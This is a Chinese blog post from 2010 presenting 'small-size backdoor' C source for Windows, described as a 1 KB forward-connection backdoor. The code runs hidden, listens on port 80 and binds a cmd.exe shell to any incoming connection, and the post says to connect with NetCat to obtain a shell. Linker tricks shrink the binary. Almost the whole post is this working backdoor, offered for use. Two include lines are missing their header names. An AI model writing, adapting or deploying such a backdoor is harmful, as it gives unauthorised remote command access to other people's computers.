上一篇: 
下一篇: 
小体积后门程序
作者:苦咖啡 日期:2010-01-28
1kb正向连接零管道后门代码
说明:
测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
复制内容到剪贴板
程序代码
程序代码*/
#pragma comment(linker, "/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint ")
#pragma comment(linker, "/INCREMENTAL:NO /IGNORE:4078 ")
#pragma comment(linker, "/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=Anskya /SECTION:Anskya,EWR ")
#pragma comment(lib, "ws2_32.lib ")
#include
#include
#define MasterPort 80 //连接端口
void Entrypoint()
{
WSADATA WSADa;
sockaddr_in SockAddrIn;
SOCKET CSocket,SSocket;
int iAddrSize;
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];
//-------------------
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//----初始化数据----
//获取cmd路径
GetEnvironmentVariable( "COMSPEC ",szCMDPath,sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x0202,&WSADa);
//设置本地信息和绑定协议
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.s_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//绑定端口
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
listen(CSocket,1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
//开始连接远程服务器
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 0 | 引用: 0 | 查看次数: 289
发表评论
